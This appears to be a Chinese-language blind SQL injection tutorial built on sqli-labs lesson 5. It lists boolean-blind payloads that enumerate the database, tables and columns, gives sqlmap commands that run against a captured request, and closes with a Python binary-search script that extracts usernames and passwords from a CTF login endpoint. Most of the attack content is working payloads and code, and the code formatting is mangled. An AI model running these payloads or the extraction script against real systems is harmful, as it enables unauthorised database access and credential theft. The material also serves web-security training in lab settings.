盲注 页面不提供查询成功的结果,没有显示位,以第5关为例:
布尔盲注 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 猜测数据库 ?id= 1 ' and length(database())=8-- - id=1' and left (database(),1 )> 'a' id= 1 ' and left(database(),1)>' z' -- - 0 在 a-z 之间 id=1' and left (database(),1 )> 'r' id= 1 ' and left(database(),1)>' s' -- -0 id=1' and left (database(),2 )> 'sa' 猜测表 id= 1 ' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>111 a 是从 0 开始第几个表,b 是为第几个字符,n 是 ASCII 所对应的十进制数 第一个表 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 第二个表 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101 判断 user 表 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name= 'user' limit 0 ,1 ),1 ,1 ))> 100 % 23 爆出字段 http:/ / localhost/ Tkitn/ sqlitest/ Less-5 / ?id= 1 ' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -
sqlmap的使用 常规:python sqlmap.py -u”127.0.0.1/sqllabs/Less-5/?id=1”
python sqlmap.py -u”127.0.0.1/sqllabs/Less-5/?id=1” –tables -D security
万能用法(跑数据包),适用于post型
burp抓包保存为1.txt
1 2 3 4 5 6 7 8 9 10 11 12 python sqlmap.py - r "1.txt" #检测注入点是否可用 python sqlmap.py - r "1.txt" python sqlmap.py - r "1.txt" python sqlmap.py - r "1.txt" python sqlmap.py - r "1.txt" python sqlmap.py - r "1.txt" python sqlmap.py - r "1.txt" python sqlmap.py - r "1.txt" - D python sqlmap.py - r "1.txt" - D - T python sqlmap.py - r "1.txt" - D - T - C”username,realname,password” #指定要爆的字段 - D 数据库名 - T 表名
被爆出的数据库会生成一个日志文件保存在本地
5到8关代码对比 Less5 Less6 Less7 Less8 拓展:SqlMap参数大全
扩展:盲注二分法脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 import requestsimport timehost = "http://web.jarvisoj.com:32787/login.php" def getDatabase (): global host ans='' for i in range (1 ,1000 ): low = 32 high = 128 mid = (low+high)//2 while low < high: payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid) param ={"username" :payload,"password" :"admin" } res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else : low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127 : break ans += chr (mid-1 ) print ("database is -> " +ans) def getTable (): global host ans='' for i in range (1 ,1000 ): low = 32 high = 128 mid = (low+high)//2 while low < high: payload = "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i, mid) param = {"username" : payload, "password" : "admin" } res = requests.post(host,data=param) if "用户名错误" in res.text: high = mid else : low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127 : break ans += chr (mid-1 ) print ("table is -> " +ans) def getColumn (): global host ans='' for i in range (1 ,1000 ): low = 32 high = 128 mid = (low+high)//2 while low < high: payload = "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % ( i, mid) param = {"username" : payload, "password" : "admin" } res = requests.post(host, data=param) if "用户名错误" in res.text: high = mid else : low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127 : break ans += chr (mid-1 ) print ("column is -> " +ans) def dumpTable (): global host ans='' for i in range (1 ,10000 ): low = 32 high = 128 mid = (low+high)//2 while low < high: payload = "1'^(ascii(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))<%d)^1#" % ( i, mid) param = {"username" : payload, "password" : "admin" } res = requests.post(host, data=param) if "用户名错误" in res.text: high = mid else : low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127 : break ans += chr (mid-1 ) print ("dumpTable is -> " +ans) dumpTable()